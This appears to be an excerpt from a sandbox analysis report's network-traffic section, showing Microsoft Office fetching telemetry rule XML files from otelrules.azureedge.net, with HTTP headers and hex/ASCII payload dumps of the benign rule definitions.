                                                                                                                                                                        Data Ascii: MS-CV: Jl7Y17WDr0qmpTNfA/GoIg.0Payload parsing failed.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        2192.168.2.64971313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:16 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:16 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:16 GMT
                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                        Content-Length: 218853
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT
                                                                                                                                                                        ETag: "0x8DD08B87243495C"
                                                                                                                                                                        x-ms-request-id: b5254561-a01e-0070-0158-3b573b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093716Z-r1d97b99577kk29chC1TEBemmg0000000a4000000000e3q4
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:16 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                        2024-11-21 09:37:17 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                        2024-11-21 09:37:17 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                        2024-11-21 09:37:17 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                        2024-11-21 09:37:17 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                        2024-11-21 09:37:17 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                        2024-11-21 09:37:17 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                        2024-11-21 09:37:17 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                        2024-11-21 09:37:17 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                        2024-11-21 09:37:17 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        3192.168.2.64971413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:19 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:20 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:19 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 3788
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                        x-ms-request-id: d37f37b1-d01e-002b-586c-3b25fb000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093719Z-1777c6cb754gvvgfhC1TEBz4rg0000000ax000000000da2f
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:20 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        4192.168.2.64971713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:19 UTC192OUTGET /rules/rule120100v3s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:20 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:19 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1000
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                        ETag: "0x8DC582BB097AFC9"
                                                                                                                                                                        x-ms-request-id: ef72f89d-401e-008c-33ed-3b86c2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093719Z-r1d97b99577mrt4rhC1TEBftkc0000000a0g00000000a98q
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:20 UTC1000INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 35 22 3e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH T="5">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        5192.168.2.64971513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:19 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:20 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 450
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                        x-ms-request-id: 704ea499-801e-00ac-498c-3bfd65000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093720Z-r1d97b995774n5h6hC1TEBvf840000000a50000000006msr
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:20 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        6192.168.2.64971813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:19 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:20 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 2160
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                        x-ms-request-id: 8753231e-501e-008f-038c-3a9054000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093720Z-1777c6cb754j8gqphC1TEB5bf80000000awg000000003r74
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:20 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        7192.168.2.64971613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:19 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:20 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:20 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 2980
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
